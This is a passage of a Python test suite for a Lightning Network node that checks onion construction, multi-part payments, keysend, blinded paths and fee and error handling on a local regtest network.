l3.daemon.wait_for_log("Got onion.*'type': 'tlv'")
@pytest.mark.developer('Needs dev-routes')
@unittest.skipIf(TEST_NETWORK != 'regtest', "Invoice is network specific")
def test_pay_no_secret(node_factory, bitcoind):
l1, l2 = node_factory.line_graph(2, wait_for_announce=True)
l2.rpc.invoice(100000, "test_pay_no_secret", "test_pay_no_secret",
preimage='00' * 32, expiry=2000000000)
# Produced from modified version (different secret!).
inv_badsecret = 'lnbcrt1u1pwuedm6pp5ve584t0cv27hwmy0cx9ca8uwyqyfw9y9dm3r8vus9fv36r2l9yjsdqaw3jhxazlwpshjhmwda0hxetrwfjhgxq8pmnt9qqcqp9sp52au0npwmw4xxv2rfrat04kh9p3jlmklgavhfxqukx0l05pw5tccs9qypqsqa286dmt2xh3jy8cd8ndeyr845q8a7nhgjkerdqjns76jraux6j25ddx9f5k5r2ey0kk942x3uhaff66794kyjxxcd48uevf7p6ja53gqjj5ur7'
with pytest.raises(RpcError, match=r"INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS.*'erring_index': 1"):
l1.rpc.pay(inv_badsecret)
# Produced from old version (no secret!)
inv_nosecret = 'lnbcrt1u1pwue4vapp5ve584t0cv27hwmy0cx9ca8uwyqyfw9y9dm3r8vus9fv36r2l9yjsdqaw3jhxazlwpshjhmwda0hxetrwfjhgxq8pmnt9qqcqp9570xsjyykvssa6ty8fjth6f2y8h09myngad9utesttwjwclv95fz3lgd402f9e5yzpnxmkypg55rkvpg522gcz4ymsjl2w3m4jhw4jsp55m7tl'
# This succeeds until we make secrets compulsory.
l1.rpc.pay(inv_nosecret)
l2.daemon.wait_for_log(r'HTLC set contains 1 HTLCs, for a total of 100000msat out of 100000msat \(no payment_secret\)')
@flaky
def test_shadow_routing(node_factory):
"""
Test the value randomization through shadow routing
Since there is a very low (0.5**10) probability that it fails we mark it
as flaky.
"""
# We need l3 for random walk
l1, l2, l3 = node_factory.line_graph(3, wait_for_announce=True)
amount = 10000
total_amount = 0
n_payments = 10
for i in range(n_payments):
inv = l3.rpc.invoice(amount, "{}".format(i), "test")["bolt11"]
total_amount += l1.rpc.pay(inv)["amount_sent_msat"]
assert total_amount.millisatoshis > n_payments * amount
# Test that the added amount isn't absurd
assert total_amount.millisatoshis < (n_payments * amount) * (1 + 0.01)
# FIXME: Test cltv delta too ?
def test_createonion_rpc(node_factory):
l1 = node_factory.get_node()
hops = [{
"pubkey": "02eec7245d6b7d2ccb30380bfbe2a3648cd7a942653f5aa340edcea1f283686619",
# legacy
"payload": "000000000000000000000000000000000000000000000000000000000000000000"
}, {
"pubkey": "0324653eac434488002cc06bbfb7f10fe18991e35f9fe4302dbea6d2353dc0ab1c",
# tlv (20 bytes)
"payload": "140101010101010101000000000000000100000001"
}, {
"pubkey": "027f31ebc5462c1fdce1b737ecff52d37d75dea43ce11c74d25aa297165faa2007",
# TLV (256 bytes)
"payload": "fd0100000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff"
}, {
"pubkey": "032c0b7cf95324a07d05398b240174dc0c2be444d96b159aa6c7f7b1e668680991",
# tlv (20 bytes)
"payload": "140303030303030303000000000000000300000003"
}, {
"pubkey": "02edabbd16b41c8371b92ef2f04c1185b4f03b6dcd52ba9b78d9d7c89c8f221145",
# legacy
"payload": "000404040404040404000000000000000400000004000000000000000000000000"
}]
res = l1.rpc.createonion(hops=hops, assocdata="BB" * 32)
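    # A serialized onion is 1366 bytes (1 version byte + 33-byte ephemeral pubkey
    # + 1300 bytes of hop payloads + 32-byte HMAC), i.e. 2732 hex characters.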
assert(len(res['onion']) == 2 * 1366)
assert(len(res['shared_secrets']) == len(hops))
res = l1.rpc.createonion(hops=hops, assocdata="42" * 32,
session_key="41" * 32)
    # The trailer is generated using the filler and can be used as a
# checksum. This trailer is from the test-vector in the specs.
print(res)
assert(res['onion'].endswith('9400f45a48e6dc8ddbaeb3'))
@pytest.mark.developer("gossip propagation is slow without DEVELOPER=1")
def test_sendonion_rpc(node_factory):
l1, l2, l3, l4 = node_factory.line_graph(4, wait_for_announce=True)
amt = 10**3
route = l1.rpc.getroute(l4.info['id'], 10**3, 10)['route']
inv = l4.rpc.invoice(amt, "lbl", "desc")
first_hop = route[0]
blockheight = l1.rpc.getinfo()['blockheight']
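    # serialize_payload builds a BOLT #4 legacy (realm 0) hop payload:
    # 1 realm byte, 8-byte short_channel_id (block << 40 | tx << 16 | output),
    # 8-byte amt_to_forward and 4-byte outgoing_cltv_value, padded with 12 zero
    # bytes to the fixed 33-byte legacy payload (createonion appends the HMAC).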
def serialize_payload(n):
block, tx, out = n['channel'].split('x')
payload = hexlify(struct.pack(
"!BQQL",
0,
int(block) << 40 | int(tx) << 16 | int(out),
int(n['amount_msat']),
blockheight + n['delay'])).decode('ASCII')
payload += "00" * 12
return payload
# Need to shift the parameters by one hop
hops = []
for h, n in zip(route[:-1], route[1:]):
# We tell the node h about the parameters to use for n (a.k.a. h + 1)
hops.append({
"pubkey": h['id'],
"payload": serialize_payload(n)
})
# The last hop has a special payload:
hops.append({
"pubkey": route[-1]['id'],
"payload": serialize_payload(route[-1])
})
onion = l1.rpc.createonion(hops=hops, assocdata=inv['payment_hash'])
l1.rpc.sendonion(onion=onion['onion'], first_hop=first_hop,
payment_hash=inv['payment_hash'])
l1.rpc.waitsendpay(payment_hash=inv['payment_hash'])
invs = l4.rpc.listinvoices(label="lbl")['invoices']
assert(len(invs) == 1 and invs[0]['status'] == 'paid')
pays = l1.rpc.listsendpays()['payments']
assert(len(pays) == 1 and pays[0]['status'] == 'complete'
and pays[0]['payment_hash'] == inv['payment_hash'])
# And now for a failing payment, using a payment_hash that doesn't match an
# invoice
payment_hash = "00" * 32
onion = l1.rpc.createonion(hops=hops, assocdata=payment_hash)
l1.rpc.sendonion(onion=onion['onion'], first_hop=first_hop,
payment_hash=payment_hash)
try:
l1.rpc.waitsendpay(payment_hash=payment_hash)
raise ValueError()
except RpcError as e:
assert(e.error['code'] == 202)
assert(e.error['message'] == "Malformed error reply")
pays = l1.rpc.listsendpays(payment_hash=payment_hash)['payments']
assert(len(pays) == 1 and pays[0]['status'] == 'failed'
and pays[0]['payment_hash'] == payment_hash)
assert('erroronion' in pays[0])
# Fail onion is msg + padding = 256 + 2*2 byte lengths + 32 byte HMAC
assert(len(pays[0]['erroronion']) == (256 + 32 + 2 + 2) * 2)
# Let's try that again, this time we give it the shared_secrets so it
# should be able to decode the error.
payment_hash = "01" * 32
onion = l1.rpc.createonion(hops=hops, assocdata=payment_hash)
l1.rpc.sendonion(onion=onion['onion'], first_hop=first_hop,
payment_hash=payment_hash,
shared_secrets=onion['shared_secrets'])
try:
l1.rpc.waitsendpay(payment_hash=payment_hash)
except RpcError as e:
assert(e.error['code'] == 204)
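        # raw_message is 400f (PERM|15) + 00000000000003e8 (the 1000msat HTLC)
        # + 0000006c (the block height at which the HTLC failed).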
assert(e.error['data']['raw_message'] == "400f00000000000003e80000006c")
@pytest.mark.developer("needs dev-disconnect, dev-no-htlc-timeout")
@pytest.mark.openchannel('v1')
@pytest.mark.openchannel('v2')
def test_partial_payment(node_factory, bitcoind, executor):
# We want to test two payments at the same time, before we send commit
l1, l2, l3, l4 = node_factory.get_nodes(4, [{}] + [{'disconnect': ['=WIRE_UPDATE_ADD_HTLC-nocommit'], 'dev-no-htlc-timeout': None}] * 2 + [{'plugin': os.path.join(os.getcwd(), 'tests/plugins/print_htlc_onion.py')}])
# Two routes to l4: one via l2, and one via l3.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 100000)
l1.rpc.connect(l3.info['id'], 'localhost', l3.port)
l1.fundchannel(l3, 100000)
l2.rpc.connect(l4.info['id'], 'localhost', l4.port)
scid24, _ = l2.fundchannel(l4, 100000)
l3.rpc.connect(l4.info['id'], 'localhost', l4.port)
scid34, _ = l3.fundchannel(l4, 100000)
bitcoind.generate_block(5)
# Wait until l1 knows about all channels.
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 8)
inv = l4.rpc.invoice(1000, 'inv', 'inv')
paysecret = l4.rpc.decodepay(inv['bolt11'])['payment_secret']
# Separate routes for each part of the payment.
r134 = l1.rpc.getroute(l4.info['id'], 501, 1, exclude=[scid24 + '/0', scid24 + '/1'])['route']
r124 = l1.rpc.getroute(l4.info['id'], 499, 1, exclude=[scid34 + '/0', scid34 + '/1'])['route']
# These can happen in parallel.
l1.rpc.sendpay(route=r134, payment_hash=inv['payment_hash'], msatoshi=1000, bolt11=inv['bolt11'], payment_secret=paysecret, partid=1)
# Can't mix non-parallel payment!
with pytest.raises(RpcError, match=r'Already have parallel payment in progress'):
l1.rpc.sendpay(route=r124,
payment_hash=inv['payment_hash'],
msatoshi=499,
payment_secret=paysecret)
# It will not allow a parallel with different msatoshi!
with pytest.raises(RpcError, match=r'msatoshi was previously 1000msat, now 999msat'):
l1.rpc.sendpay(route=r124, payment_hash=inv['payment_hash'],
msatoshi=999, bolt11=inv['bolt11'],
payment_secret=paysecret, partid=2)
# This will work fine.
l1.rpc.sendpay(route=r124, payment_hash=inv['payment_hash'],
msatoshi=1000, bolt11=inv['bolt11'],
payment_secret=paysecret, partid=2)
# Any more would exceed total payment
with pytest.raises(RpcError, match=r'Already have 1000msat of 1000msat payments in progress'):
l1.rpc.sendpay(route=r124, payment_hash=inv['payment_hash'],
msatoshi=1000, bolt11=inv['bolt11'], payment_secret=paysecret, partid=3)
# But repeat is a NOOP, as long as they're exactly the same!
with pytest.raises(RpcError, match=r'Already pending with amount 501msat \(not 499msat\)'):
l1.rpc.sendpay(route=r124, payment_hash=inv['payment_hash'], msatoshi=1000, bolt11=inv['bolt11'], payment_secret=paysecret, partid=1)
l1.rpc.sendpay(route=r134, payment_hash=inv['payment_hash'], msatoshi=1000, bolt11=inv['bolt11'], payment_secret=paysecret, partid=1)
l1.rpc.sendpay(route=r124, payment_hash=inv['payment_hash'], msatoshi=1000, bolt11=inv['bolt11'], payment_secret=paysecret, partid=2)
# Make sure they've done the suppress-commitment thing before we unsuppress
l2.daemon.wait_for_log(r'dev_disconnect')
l3.daemon.wait_for_log(r'dev_disconnect')
# Now continue, payments will succeed due to MPP.
l2.rpc.dev_reenable_commit(l4.info['id'])
l3.rpc.dev_reenable_commit(l4.info['id'])
res = l1.rpc.waitsendpay(payment_hash=inv['payment_hash'], partid=1)
assert res['partid'] == 1
res = l1.rpc.waitsendpay(payment_hash=inv['payment_hash'], partid=2)
assert res['partid'] == 2
for i in range(2):
line = l4.daemon.wait_for_log('print_htlc_onion.py: Got onion')
assert "'type': 'tlv'" in line
assert "'forward_amount': '499msat'" in line or "'forward_amount': '501msat'" in line
assert "'total_msat': '1000msat'" in line
assert "'payment_secret': '{}'".format(paysecret) in line
pay = only_one(l1.rpc.listpays()['pays'])
assert pay['bolt11'] == inv['bolt11']
assert pay['status'] == 'complete'
assert pay['number_of_parts'] == 2
assert pay['amount_sent_msat'] == Millisatoshi(1002)
# It will immediately succeed if we pay again.
pay = l1.rpc.sendpay(route=r124, payment_hash=inv['payment_hash'], msatoshi=1000, bolt11=inv['bolt11'], payment_secret=paysecret, partid=2)
assert pay['status'] == 'complete'
# If we try with an unknown partid, it will refuse.
with pytest.raises(RpcError, match=r'Already succeeded'):
l1.rpc.sendpay(route=r124, payment_hash=inv['payment_hash'], msatoshi=1000, bolt11=inv['bolt11'], payment_secret=paysecret, partid=3)
def test_partial_payment_timeout(node_factory, bitcoind):
l1, l2 = node_factory.line_graph(2)
inv = l2.rpc.invoice(1000, 'inv', 'inv')
paysecret = l2.rpc.decodepay(inv['bolt11'])['payment_secret']
route = l1.rpc.getroute(l2.info['id'], 500, 1)['route']
l1.rpc.sendpay(route=route, payment_hash=inv['payment_hash'], msatoshi=1000, bolt11=inv['bolt11'], payment_secret=paysecret, partid=1)
with pytest.raises(RpcError, match=r'WIRE_MPP_TIMEOUT'):
l1.rpc.waitsendpay(payment_hash=inv['payment_hash'], timeout=70 + TIMEOUT // 4, partid=1)
l2.daemon.wait_for_log(r'HTLC set contains 1 HTLCs, for a total of 500msat out of 1000msat \(payment_secret\)')
# We can still pay it normally.
l1.rpc.sendpay(route=route, payment_hash=inv['payment_hash'], msatoshi=1000, bolt11=inv['bolt11'], payment_secret=paysecret, partid=1)
l1.rpc.sendpay(route=route, payment_hash=inv['payment_hash'], msatoshi=1000, bolt11=inv['bolt11'], payment_secret=paysecret, partid=2)
l1.rpc.waitsendpay(payment_hash=inv['payment_hash'], timeout=TIMEOUT, partid=1)
l1.rpc.waitsendpay(payment_hash=inv['payment_hash'], timeout=TIMEOUT, partid=2)
l2.daemon.wait_for_log(r'HTLC set contains 1 HTLCs, for a total of 500msat out of 1000msat \(payment_secret\)')
l2.daemon.wait_for_log(r'HTLC set contains 2 HTLCs, for a total of 1000msat out of 1000msat \(payment_secret\)')
def test_partial_payment_restart(node_factory, bitcoind):
"""Test that we recover a set when we restart"""
l1, l2, l3 = node_factory.line_graph(3, wait_for_announce=True,
opts=[{}]
+ [{'may_reconnect': True}] * 2)
inv = l3.rpc.invoice(1000, 'inv', 'inv')
paysecret = l3.rpc.decodepay(inv['bolt11'])['payment_secret']
route = l1.rpc.getroute(l3.info['id'], 500, 1)['route']
l1.rpc.sendpay(route=route, payment_hash=inv['payment_hash'], msatoshi=1000, bolt11=inv['bolt11'], payment_secret=paysecret, partid=1)
wait_for(lambda: [f['status'] for f in l2.rpc.listforwards()['forwards']] == ['offered'])
# Restart, and make sure it's reconnected to l2.
l3.restart()
print(l2.rpc.listpeers())
wait_for(lambda: [p['connected'] for p in l2.rpc.listpeers()['peers']] == [True, True])
# Pay second part.
l1.rpc.sendpay(route=route, payment_hash=inv['payment_hash'], msatoshi=1000, bolt11=inv['bolt11'], payment_secret=paysecret, partid=2)
l1.rpc.waitsendpay(payment_hash=inv['payment_hash'], timeout=TIMEOUT, partid=1)
l1.rpc.waitsendpay(payment_hash=inv['payment_hash'], timeout=TIMEOUT, partid=2)
@pytest.mark.developer("needs dev-disconnect")
def test_partial_payment_htlc_loss(node_factory, bitcoind):
"""Test that we discard a set when the HTLC is lost"""
# We want l2 to fail once it has completed first htlc.
l1, l2, l3 = node_factory.line_graph(3, wait_for_announce=True,
opts=[{},
{'disconnect': ['=WIRE_UPDATE_ADD_HTLC', '+WIRE_REVOKE_AND_ACK']},
{}])
inv = l3.rpc.invoice(1000, 'inv', 'inv')
paysecret = l3.rpc.decodepay(inv['bolt11'])['payment_secret']
route = l1.rpc.getroute(l3.info['id'], 500, 1)['route']
l1.rpc.sendpay(route=route, payment_hash=inv['payment_hash'], msatoshi=1000, bolt11=inv['bolt11'], payment_secret=paysecret, partid=1)
wait_for(lambda: not only_one(l2.rpc.listpeers(l3.info['id'])['peers'])['connected'])
l2.rpc.dev_fail(l3.info['id'])
# Since HTLC is missing from commit (dust), it's closed as soon as l2 sees
# it onchain. l3 shouldn't crash though.
bitcoind.generate_block(1, wait_for_mempool=1)
with pytest.raises(RpcError,
match=r'WIRE_PERMANENT_CHANNEL_FAILURE \(reply from remote\)'):
l1.rpc.waitsendpay(payment_hash=inv['payment_hash'], timeout=TIMEOUT, partid=1)
def test_createonion_limits(node_factory):
l1, = node_factory.get_nodes(1)
hops = [{
"pubkey": "02eec7245d6b7d2ccb30380bfbe2a3648cd7a942653f5aa340edcea1f283686619",
"payload": "00" * 228
}, {
"pubkey": "0324653eac434488002cc06bbfb7f10fe18991e35f9fe4302dbea6d2353dc0ab1c",
"payload": "00" * 228
}, {
"pubkey": "027f31ebc5462c1fdce1b737ecff52d37d75dea43ce11c74d25aa297165faa2007",
"payload": "00" * 228
}, {
"pubkey": "032c0b7cf95324a07d05398b240174dc0c2be444d96b159aa6c7f7b1e668680991",
"payload": "00" * 228
}, {
"pubkey": "02edabbd16b41c8371b92ef2f04c1185b4f03b6dcd52ba9b78d9d7c89c8f221145",
"payload": "00" * 228
}]
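    # 5 hops * (228-byte payload + 32-byte HMAC) = 1300 bytes, exactly the size
    # of the onion routing-info field.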
    # This should succeed since it's right at the edge
l1.rpc.createonion(hops=hops, assocdata="BB" * 32)
# This one should fail however
with pytest.raises(RpcError, match=r'Payloads exceed maximum onion packet size.'):
hops[0]['payload'] += '01'
l1.rpc.createonion(hops=hops, assocdata="BB" * 32)
@pytest.mark.developer("needs use_shadow")
def test_blockheight_disagreement(node_factory, bitcoind, executor):
"""
While a payment is in-transit from payer to payee, a block
might be mined, so that the blockheight the payer used to
initiate the payment is no longer the blockheight when the
payee receives it.
This leads to a failure which *used* to be
`final_expiry_too_soon`, a non-permanent failure, but
which is *now* `incorrect_or_unknown_payment_details`,
a permanent failure.
`pay` treats permanent failures as, well, permanent, and
gives up on receiving such failure from the payee, but
this particular subcase of blockheight disagreement is
actually a non-permanent failure (the payer only needs
to synchronize to the same blockheight as the payee).
"""
l1, l2 = node_factory.line_graph(2)
sync_blockheight(bitcoind, [l1, l2])
# Arrange l1 to stop getting new blocks.
def no_more_blocks(req):
return {"result": None,
"error": {"code": -8, "message": "Block height out of range"}, "id": req['id']}
l1.daemon.rpcproxy.mock_rpc('getblockhash', no_more_blocks)
# Increase blockheight and make sure l2 knows it.
# Why 2? Because `pay` uses min_final_cltv_expiry + 1.
# But 2 blocks coming in close succession, plus slow
# forwarding nodes and block propagation, are still
# possible on the mainnet, thus this test.
bitcoind.generate_block(2)
sync_blockheight(bitcoind, [l2])
# Have l2 make an invoice.
inv = l2.rpc.invoice(1000, 'l', 'd')['bolt11']
# Have l1 pay l2
def pay(l1, inv):
l1.rpc.dev_pay(inv, use_shadow=False)
fut = executor.submit(pay, l1, inv)
# Make sure l1 sends out the HTLC.
l1.daemon.wait_for_logs([r'NEW:: HTLC LOCAL'])
# Unblock l1 from new blocks.
l1.daemon.rpcproxy.mock_rpc('getblockhash', None)
# pay command should complete without error
fut.result()
def test_sendpay_msatoshi_arg(node_factory):
"""sendpay msatoshi arg was used for non-MPP to indicate the amount
they asked for. But using it with anything other than the final amount
caused a crash in 0.8.0, so we then disallowed it.
"""
l1, l2 = node_factory.line_graph(2)
inv = l2.rpc.invoice(1000, 'inv', 'inv')
# Can't send non-MPP payment which specifies msatoshi != final.
with pytest.raises(RpcError, match=r'Do not specify msatoshi \(1001msat\) without'
' partid: if you do, it must be exactly'
r' the final amount \(1000msat\)'):
l1.rpc.sendpay(route=l1.rpc.getroute(l2.info['id'], 1000, 1)['route'], payment_hash=inv['payment_hash'], msatoshi=1001, bolt11=inv['bolt11'])
with pytest.raises(RpcError, match=r'Do not specify msatoshi \(999msat\) without'
' partid: if you do, it must be exactly'
r' the final amount \(1000msat\)'):
l1.rpc.sendpay(route=l1.rpc.getroute(l2.info['id'], 1000, 1)['route'], payment_hash=inv['payment_hash'], msatoshi=999, bolt11=inv['bolt11'])
# Can't send MPP payment which pays any more than amount.
with pytest.raises(RpcError, match=r'Final amount 1001msat is greater than 1000msat, despite MPP'):
l1.rpc.sendpay(route=l1.rpc.getroute(l2.info['id'], 1001, 1)['route'], payment_hash=inv['payment_hash'], msatoshi=1000, bolt11=inv['bolt11'], partid=1)
# But this works
l1.rpc.sendpay(route=l1.rpc.getroute(l2.info['id'], 1001, 1)['route'], payment_hash=inv['payment_hash'], msatoshi=1001, bolt11=inv['bolt11'])
l1.rpc.waitsendpay(inv['payment_hash'])
inv = only_one(l2.rpc.listinvoices('inv')['invoices'])
assert inv['status'] == 'paid'
assert inv['amount_received_msat'] == Millisatoshi(1001)
def test_reject_invalid_payload(node_factory):
"""Send an onion payload with an unknown even type.
    Recipient l2 should reject the incoming HTLC with an invalid onion
payload error.
"""
l1, l2 = node_factory.line_graph(2)
amt = 10**3
route = l1.rpc.getroute(l2.info['id'], amt, 10)['route']
inv = l2.rpc.invoice(amt, "lbl", "desc")
first_hop = route[0]
# A TLV payload with an unknown even type:
payload = TlvPayload()
payload.add_field(0xB000, b'Hi there')
hops = [{"pubkey": l2.info['id'], "payload": payload.to_hex()}]
onion = l1.rpc.createonion(hops=hops, assocdata=inv['payment_hash'])
l1.rpc.sendonion(onion=onion['onion'],
first_hop=first_hop,
payment_hash=inv['payment_hash'],
shared_secrets=onion['shared_secrets'])
l2.daemon.wait_for_log(r'Failing HTLC because of an invalid payload')
with pytest.raises(RpcError, match=r'WIRE_INVALID_ONION_PAYLOAD'):
l1.rpc.waitsendpay(inv['payment_hash'])
@unittest.skipIf(not EXPERIMENTAL_FEATURES, "Needs blinding args to sendpay")
def test_sendpay_blinding(node_factory):
l1, l2, l3, l4 = node_factory.line_graph(4)
blindedpathtool = os.path.join(os.path.dirname(__file__), "..", "devtools", "blindedpath")
# Create blinded path l2->l4
output = subprocess.check_output(
[blindedpathtool, '--simple-output', 'create',
l2.info['id'] + "/" + l2.get_channel_scid(l3),
l3.info['id'] + "/" + l3.get_channel_scid(l4),
l4.info['id']]
).decode('ASCII').strip()
# First line is blinding, then <peerid> then <encblob>.
blinding, p1, p1enc, p2, p2enc, p3 = output.split('\n')
# First hop can't be blinded!
assert p1 == l2.info['id']
amt = 10**3
inv = l4.rpc.invoice(amt, "lbl", "desc")
route = [{'id': l2.info['id'],
'channel': l1.get_channel_scid(l2),
'amount_msat': Millisatoshi(1002),
'delay': 21,
'blinding': blinding,
'enctlv': p1enc},
{'id': p2,
'amount_msat': Millisatoshi(1001),
'delay': 15,
# FIXME: this is a dummy!
'channel': '0x0x0',
'enctlv': p2enc},
{'id': p3,
# FIXME: this is a dummy!
'channel': '0x0x0',
'amount_msat': Millisatoshi(1000),
'delay': 9,
'style': 'tlv'}]
l1.rpc.sendpay(route=route,
payment_hash=inv['payment_hash'],
bolt11=inv['bolt11'])
l1.rpc.waitsendpay(inv['payment_hash'])
def test_excluded_adjacent_routehint(node_factory, bitcoind, compat):
"""Test case where we try have a routehint which leads to an adjacent
node, but the result exceeds our maxfee; we crashed trying to find
what part of the path was most expensive in that case
"""
l1, l2, l3 = node_factory.line_graph(3)
# We'll be forced to use routehint, since we don't know about l3.
wait_for(lambda: len(l3.rpc.listchannels(source=l2.info['id'])['channels']) == 1)
inv = l3.rpc.invoice(10**3, "lbl", "desc", exposeprivatechannels=l2.get_channel_scid(l3))
# This will make it reject the routehint.
err = r'Fee exceeds our fee budget: 1msat > 0msat, discarding route'
with pytest.raises(RpcError, match=err):
l1.rpc.pay(bolt11=inv['bolt11'], maxfeepercent=0, exemptfee=0)
def test_keysend(node_factory):
amt = 10000
l1, l2, l3, l4 = node_factory.line_graph(
4,
wait_for_announce=True,
opts=[{}, {}, {}, {'disable-plugin': 'keysend'}]
)
# The keysend featurebit must be set in the announcement, i.e., l1 should
# learn that l3 supports keysends.
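    # (keysend is signalled via feature bit 55, hence the >> 55 below)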
features = l1.rpc.listnodes(l3.info['id'])['nodes'][0]['features']
assert(int(features, 16) >> 55 & 0x01 == 1)
# If we disable keysend, then the featurebit must not be set,
# i.e., l4 doesn't support it.
features = l1.rpc.listnodes(l4.info['id'])['nodes'][0]['features']
assert(int(features, 16) >> 55 & 0x01 == 0)
# Self-sends are not allowed (see #4438)
with pytest.raises(RpcError, match=r'We are the destination.'):
l1.rpc.keysend(l1.info['id'], amt)
# Send an indirect one from l1 to l3
l1.rpc.keysend(l3.info['id'], amt)
invs = l3.rpc.listinvoices()['invoices']
assert(len(invs) == 1)
inv = invs[0]
print(inv)
assert(inv['msatoshi_received'] >= amt)
# Now send a direct one instead from l1 to l2
l1.rpc.keysend(l2.info['id'], amt)
invs = l2.rpc.listinvoices()['invoices']
assert(len(invs) == 1)
inv = invs[0]
assert(inv['msatoshi_received'] >= amt)
# And finally try to send a keysend payment to l4, which doesn't
# support it. It MUST fail.
with pytest.raises(RpcError, match=r"Recipient [0-9a-f]{66} reported an invalid payload"):
l3.rpc.keysend(l4.info['id'], amt)
def test_invalid_onion_channel_update(node_factory):
'''
Some onion failures "should" send a `channel_update`.
This test checks to see if we handle things correctly
even if some remote node does not send the required
`channel_update`.
'''
plugin = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs_invalid.py')
l1, l2, l3 = node_factory.line_graph(3,
opts=[{},
{'plugin': plugin},
{}],
wait_for_announce=True)
l1id = l1.info['id']
inv = l3.rpc.invoice(12345, 'inv', 'inv')['bolt11']
# Should fail, since l2 will always fail to forward.
with pytest.raises(RpcError):
l1.rpc.pay(inv)
# l1 should still be alive afterwards.
assert l1.rpc.getinfo()['id'] == l1id
@pytest.mark.developer("Requires use_shadow")
def test_pay_exemptfee(node_factory, compat):
"""Tiny payment, huge fee
l1 -> l2 -> l3
Create a tiny invoice for 1 msat, it'll be dominated by the base_fee on
the l2->l3 channel. So it'll get rejected on the first attempt if we set
the exemptfee way too low. The default fee exemption threshold is
5000msat, so 5001msat is not exempted by default and a 5001msat fee on
l2->l3 should trigger this.
"""
l1, l2, l3 = node_factory.line_graph(
3,
opts=[{}, {'fee-base': 5001, 'fee-per-satoshi': 0}, {}],
wait_for_announce=True
)
err = r'Ran out of routes to try'
with pytest.raises(RpcError, match=err):
l1.rpc.dev_pay(l3.rpc.invoice(1, "lbl1", "desc")['bolt11'], use_shadow=False)
# If we tell our node that 5001msat is ok this should work
l1.rpc.dev_pay(l3.rpc.invoice(1, "lbl2", "desc")['bolt11'], use_shadow=False, exemptfee=5001)
# Given the above network this is the smallest amount that passes without
# the fee-exemption (notice that we let it through on equality).
threshold = int(5001 / 0.05)
    # This is just below that threshold, so the fee exemption does not apply
    # and the payment should be rejected
with pytest.raises(RpcError, match=err):
l1.rpc.dev_pay(l3.rpc.invoice(threshold - 1, "lbl3", "desc")['bolt11'], use_shadow=False)
# While this'll work just fine
l1.rpc.dev_pay(l3.rpc.invoice(int(5001 * 200), "lbl4", "desc")['bolt11'], use_shadow=False)
@pytest.mark.developer("Requires use_shadow flag")
def test_pay_peer(node_factory, bitcoind):
"""If we have a direct channel to the destination we should use that.
This is complicated a bit by not having sufficient capacity, but the
channel_hints can help us there.
l1 -> l2
| ^
v /
l3
"""
l1, l2, l3 = node_factory.get_nodes(3)
node_factory.join_nodes([l1, l2])
node_factory.join_nodes([l1, l3])
node_factory.join_nodes([l3, l2], wait_for_announce=True)
wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 6)
def spendable(n1, n2):
peer = n1.rpc.listpeers(n2.info['id'])['peers'][0]
chan = peer['channels'][0]
avail = chan['spendable_msat']
return avail
amt = Millisatoshi(10**8)
# How many payments do we expect to go through directly?
direct = spendable(l1, l2).millisatoshis // amt.millisatoshis
# Remember the l1 -> l3 capacity, it should not change until we run out of
# direct capacity.
l1l3cap = spendable(l1, l3)
for i in range(0, direct):
inv = l2.rpc.invoice(amt.millisatoshis, "lbl{}".format(i),
"desc{}".format(i))['bolt11']
l1.rpc.dev_pay(inv, use_shadow=False)
# We should not have more than amt in the direct channel anymore
assert(spendable(l1, l2) < amt)
assert(spendable(l1, l3) == l1l3cap)
# Next one should take the alternative, but it should still work
inv = l2.rpc.invoice(amt.millisatoshis, "final", "final")['bolt11']
l1.rpc.dev_pay(inv, use_shadow=False)
def test_mpp_presplit(node_factory):
"""Make a rather large payment of 5*10ksat and see it being split.
"""
    MPP_TARGET_SIZE = 10**7  # Taken from libplugin-pay.c
amt = 5 * MPP_TARGET_SIZE
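    # The presplitter aims for parts of roughly MPP_TARGET_SIZE, so this amount
    # should end up split into at least 5 parts.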
# Assert that the amount we're going to send is indeed larger than our
# split size.
assert(MPP_TARGET_SIZE < amt)
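    # With amt = 5 * MPP_TARGET_SIZE the presplitter is expected to produce at
    # least amt / MPP_TARGET_SIZE = 5 partial payments, which the final
    # assertion below checks.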
l1, l2, l3 = node_factory.line_graph(
3, fundamount=10**8, wait_for_announce=True,
opts={'wumbo': None}
)
inv = l3.rpc.invoice(amt, 'lbl', 'desc')['bolt11']
p = l1.rpc.pay(inv)
assert(p['parts'] >= 5)
inv = l3.rpc.listinvoices()['invoices'][0]
assert(inv['msatoshi'] == inv['msatoshi_received'])
def test_mpp_adaptive(node_factory, bitcoind):
"""We have two paths, both too small on their own, let's combine them.
```dot
digraph {
l1 -> l2 [label="scid=103x1x1, cap=amt-1"];
l2 -> l4 [label="scid=105x1x1, cap=max"];
l1 -> l3 [label="scid=107x1x1, cap=max"];
l3 -> l4 [label="scid=109x1x1, cap=amt-1"];
}
"""
amt = 10**7 - 1
l1, l2, l3, l4 = node_factory.get_nodes(4)
l1.connect(l2)
l2.connect(l4)
l1.connect(l3)
l3.connect(l4)
# First roadblock right away on an outgoing channel
l2.fundchannel(l1, amt)
l2.fundchannel(l4, amt, wait_for_active=True)
l2.rpc.pay(l1.rpc.invoice(
amt + 99999000 - 1, # Slightly less than amt + reserve
label="reb l1->l2",
description="Rebalance l1 -> l2"
)['bolt11'])
# Second path fails only after the first hop
l1.fundchannel(l3, amt)
l4.fundchannel(l3, amt, wait_for_active=True)
l4.rpc.pay(l3.rpc.invoice(
amt + 99999000 - 1, # Slightly less than amt + reserve
label="reb l3->l4",
description="Rebalance l3 -> l4"
)['bolt11'])
l1.rpc.listpeers()
# Make sure neither channel can fit the payment by itself.
c12 = l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'][0]
